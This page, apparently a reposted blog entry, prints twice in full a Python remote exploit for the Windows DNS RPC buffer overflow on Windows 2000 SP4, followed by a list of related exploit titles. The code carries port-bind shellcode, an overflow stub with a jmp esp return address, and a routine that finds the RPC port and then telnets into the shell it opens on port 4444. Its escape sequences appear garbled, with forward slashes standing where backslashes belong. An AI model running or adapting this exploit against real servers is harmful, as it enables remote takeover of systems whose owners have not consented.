MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)
2008-08-25 08:59
585 查看
#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in http://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
shellcode += "/x29/xc9/x83/xe9/xb0/xe8/xff/xff/xff/xff/xc0/x5e/x81/x76/x0e/xe9"
shellcode += "/x4a/xb6/xa9/x83/xee/xfc/xe2/xf4/x15/x20/x5d/xe4/x01/xb3/x49/x56"
shellcode += "/x16/x2a/x3d/xc5/xcd/x6e/x3d/xec/xd5/xc1/xca/xac/x91/x4b/x59/x22"
shellcode += "/xa6/x52/x3d/xf6/xc9/x4b/x5d/xe0/x62/x7e/x3d/xa8/x07/x7b/x76/x30"
shellcode += "/x45/xce/x76/xdd/xee/x8b/x7c/xa4/xe8/x88/x5d/x5d/xd2/x1e/x92/x81"
shellcode += "/x9c/xaf/x3d/xf6/xcd/x4b/x5d/xcf/x62/x46/xfd/x22/xb6/x56/xb7/x42"
shellcode += "/xea/x66/x3d/x20/x85/x6e/xaa/xc8/x2a/x7b/x6d/xcd/x62/x09/x86/x22"
shellcode += "/xa9/x46/x3d/xd9/xf5/xe7/x3d/xe9/xe1/x14/xde/x27/xa7/x44/x5a/xf9"
shellcode += "/x16/x9c/xd0/xfa/x8f/x22/x85/x9b/x81/x3d/xc5/x9b/xb6/x1e/x49/x79"
shellcode += "/x81/x81/x5b/x55/xd2/x1a/x49/x7f/xb6/xc3/x53/xcf/x68/xa7/xbe/xab"
shellcode += "/xbc/x20/xb4/x56/x39/x22/x6f/xa0/x1c/xe7/xe1/x56/x3f/x19/xe5/xfa"
shellcode += "/xba/x19/xf5/xfa/xaa/x19/x49/x79/x8f/x22/xa7/xf5/x8f/x19/x3f/x48"
shellcode += "/x7c/x22/x12/xb3/x99/x8d/xe1/x56/x3f/x20/xa6/xf8/xbc/xb5/x66/xc1"
shellcode += "/x4d/xe7/x98/x40/xbe/xb5/x60/xfa/xbc/xb5/x66/xc1/x0c/x03/x30/xe0"
shellcode += "/xbe/xb5/x60/xf9/xbd/x1e/xe3/x56/x39/xd9/xde/x4e/x90/x8c/xcf/xfe"
shellcode += "/x16/x9c/xe3/x56/x39/x2c/xdc/xcd/x8f/x22/xd5/xc4/x60/xaf/xdc/xf9"
shellcode += "/xb0/x63/x7a/x20/x0e/x20/xf2/x20/x0b/x7b/x76/x5a/x43/xb4/xf4/x84"
shellcode += "/x17/x08/x9a/x3a/x64/x30/x8e/x02/x42/xe1/xde/xdb/x17/xf9/xa0/x56"
shellcode += "/x9c/x0e/x49/x7f/xb2/x1d/xe4/xf8/xb8/x1b/xdc/xa8/xb8/x1b/xe3/xf8"
shellcode += "/x16/x9a/xde/x04/x30/x4f/x78/xfa/x16/x9c/xdc/x56/x16/x7d/x49/x79"
shellcode += "/x62/x1d/x4a/x2a/x2d/x2e/x49/x7f/xbb/xb5/x66/xc1/x19/xc0/xb2/xf6"
shellcode += "/xba/xb5/x60/x56/x39/x4a/xb6/xa9"
# Stub sections taken from metasploit
stub = '/xd2/x5f/xab/xdb/x04/x00/x00/x00/x00/x00/x00/x00/x04/x00/x00/x00'
stub += '/x70/x00/x00/x00/x00/x00/x00/x00/x1f/x38/x8a/x9f/x12/x05/x00/x00'
stub += '/x00/x00/x00/x00/x12/x05/x00/x00'
stub += '//A' * 465
# At the time of overflow ESP points into our buffer which has each char
# prepended by a '/' and our shellcode code is about 24+ bytes away from
# where EDX points
stub += '///x80///x62///xE1///x77'#Address of jmp esp from user32.dll
# The following B's which in assembly translates to 'inc EDX' increments
# about 31 times EDX so that it points into our shellcode
stub += '//B' * 43
# Translates to 'jmp EDX'
stub += '///xff///xe2'
stub += '//A' * 134
stub += '/x00/x00/x00/x00/x76/xcf/x80/xfd/x03/x00/x00/x00/x00/x00/x00/x00'
stub += '/x03/x00/x00/x00/x47/x00/x00/x00'
stub += shellcode
# Code ripped from core security document on impacket
# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf
# Not a neat way to discover a dynamic port :-)
def DiscoverDNSport(target):
trans = transport.SMBTransport(target, 139, 'epmapper')
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
pm = epm.DCERPCEpm(dce)
handle = '/x00'*20
while 1:
dump = pm.portmap_dump(handle)
if not dump.get_entries_num():
break
handle = dump.get_handle()
entry = dump.get_entry().get_entry()
if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
port = entry.get_string_binding().split('[')[1][:-1]
return int(port)
print '[-] Could not locate DNS port; Target might not be running DNS'
def ExploitDNS(target, port):
trans = transport.TCPTransport(target, port)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))
dce.call(0x01, stub)
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target ip address>' % sys.argv[0]
sys.exit(-1)
print '[+] Locating DNS RPC port'
port = DiscoverDNSport(target)
print '[+] Located DNS RPC service on TCP port: %d' % port
ExploitDNS(target, port)
print '[+] Exploit sent. Connecting to shell in 3 seconds'
time.sleep(3)
ConnectRemoteShell(target)
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in http://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
shellcode += "/x29/xc9/x83/xe9/xb0/xe8/xff/xff/xff/xff/xc0/x5e/x81/x76/x0e/xe9"
shellcode += "/x4a/xb6/xa9/x83/xee/xfc/xe2/xf4/x15/x20/x5d/xe4/x01/xb3/x49/x56"
shellcode += "/x16/x2a/x3d/xc5/xcd/x6e/x3d/xec/xd5/xc1/xca/xac/x91/x4b/x59/x22"
shellcode += "/xa6/x52/x3d/xf6/xc9/x4b/x5d/xe0/x62/x7e/x3d/xa8/x07/x7b/x76/x30"
shellcode += "/x45/xce/x76/xdd/xee/x8b/x7c/xa4/xe8/x88/x5d/x5d/xd2/x1e/x92/x81"
shellcode += "/x9c/xaf/x3d/xf6/xcd/x4b/x5d/xcf/x62/x46/xfd/x22/xb6/x56/xb7/x42"
shellcode += "/xea/x66/x3d/x20/x85/x6e/xaa/xc8/x2a/x7b/x6d/xcd/x62/x09/x86/x22"
shellcode += "/xa9/x46/x3d/xd9/xf5/xe7/x3d/xe9/xe1/x14/xde/x27/xa7/x44/x5a/xf9"
shellcode += "/x16/x9c/xd0/xfa/x8f/x22/x85/x9b/x81/x3d/xc5/x9b/xb6/x1e/x49/x79"
shellcode += "/x81/x81/x5b/x55/xd2/x1a/x49/x7f/xb6/xc3/x53/xcf/x68/xa7/xbe/xab"
shellcode += "/xbc/x20/xb4/x56/x39/x22/x6f/xa0/x1c/xe7/xe1/x56/x3f/x19/xe5/xfa"
shellcode += "/xba/x19/xf5/xfa/xaa/x19/x49/x79/x8f/x22/xa7/xf5/x8f/x19/x3f/x48"
shellcode += "/x7c/x22/x12/xb3/x99/x8d/xe1/x56/x3f/x20/xa6/xf8/xbc/xb5/x66/xc1"
shellcode += "/x4d/xe7/x98/x40/xbe/xb5/x60/xfa/xbc/xb5/x66/xc1/x0c/x03/x30/xe0"
shellcode += "/xbe/xb5/x60/xf9/xbd/x1e/xe3/x56/x39/xd9/xde/x4e/x90/x8c/xcf/xfe"
shellcode += "/x16/x9c/xe3/x56/x39/x2c/xdc/xcd/x8f/x22/xd5/xc4/x60/xaf/xdc/xf9"
shellcode += "/xb0/x63/x7a/x20/x0e/x20/xf2/x20/x0b/x7b/x76/x5a/x43/xb4/xf4/x84"
shellcode += "/x17/x08/x9a/x3a/x64/x30/x8e/x02/x42/xe1/xde/xdb/x17/xf9/xa0/x56"
shellcode += "/x9c/x0e/x49/x7f/xb2/x1d/xe4/xf8/xb8/x1b/xdc/xa8/xb8/x1b/xe3/xf8"
shellcode += "/x16/x9a/xde/x04/x30/x4f/x78/xfa/x16/x9c/xdc/x56/x16/x7d/x49/x79"
shellcode += "/x62/x1d/x4a/x2a/x2d/x2e/x49/x7f/xbb/xb5/x66/xc1/x19/xc0/xb2/xf6"
shellcode += "/xba/xb5/x60/x56/x39/x4a/xb6/xa9"
# Stub sections taken from metasploit
stub = '/xd2/x5f/xab/xdb/x04/x00/x00/x00/x00/x00/x00/x00/x04/x00/x00/x00'
stub += '/x70/x00/x00/x00/x00/x00/x00/x00/x1f/x38/x8a/x9f/x12/x05/x00/x00'
stub += '/x00/x00/x00/x00/x12/x05/x00/x00'
stub += '//A' * 465
# At the time of overflow ESP points into our buffer which has each char
# prepended by a '/' and our shellcode code is about 24+ bytes away from
# where EDX points
stub += '///x80///x62///xE1///x77'#Address of jmp esp from user32.dll
# The following B's which in assembly translates to 'inc EDX' increments
# about 31 times EDX so that it points into our shellcode
stub += '//B' * 43
# Translates to 'jmp EDX'
stub += '///xff///xe2'
stub += '//A' * 134
stub += '/x00/x00/x00/x00/x76/xcf/x80/xfd/x03/x00/x00/x00/x00/x00/x00/x00'
stub += '/x03/x00/x00/x00/x47/x00/x00/x00'
stub += shellcode
# Code ripped from core security document on impacket
# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf
# Not a neat way to discover a dynamic port :-)
def DiscoverDNSport(target):
trans = transport.SMBTransport(target, 139, 'epmapper')
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
pm = epm.DCERPCEpm(dce)
handle = '/x00'*20
while 1:
dump = pm.portmap_dump(handle)
if not dump.get_entries_num():
break
handle = dump.get_handle()
entry = dump.get_entry().get_entry()
if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
port = entry.get_string_binding().split('[')[1][:-1]
return int(port)
print '[-] Could not locate DNS port; Target might not be running DNS'
def ExploitDNS(target, port):
trans = transport.TCPTransport(target, port)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))
dce.call(0x01, stub)
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target ip address>' % sys.argv[0]
sys.exit(-1)
print '[+] Locating DNS RPC port'
port = DiscoverDNSport(target)
print '[+] Located DNS RPC service on TCP port: %d' % port
ExploitDNS(target, port)
print '[+] Exploit sent. Connecting to shell in 3 seconds'
time.sleep(3)
ConnectRemoteShell(target)
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)
- Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code
- MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit
- Microsoft Windows DNS RPC Buffer Overflow
- Windows RPC DCOM Remote Exploit with 48
- MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
- IBM AIX 'rpc.cmsd' Calendar Daemon Remote Stack Buffer Overflow Vulnerability
- mo_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)
- Microsoft Windows DHCP Client Service Remote Buffer Overflow
- Windows WorkStation Remote BufferOverflow
- MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
- Sasser Worm FTPD Remote Buffer Overflow Exploit on Port 5554
- Microsoft Windows DHCP Client Service Remote Buffer Overflow
- IBM AIX 'rpc.cmsd' Calendar Daemon Remote Stack Buffer Overflow Vulnerability
- 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
- Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
- 【分析】MS RPC LOCATOR Service Exploit for win2k(new version)
- Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)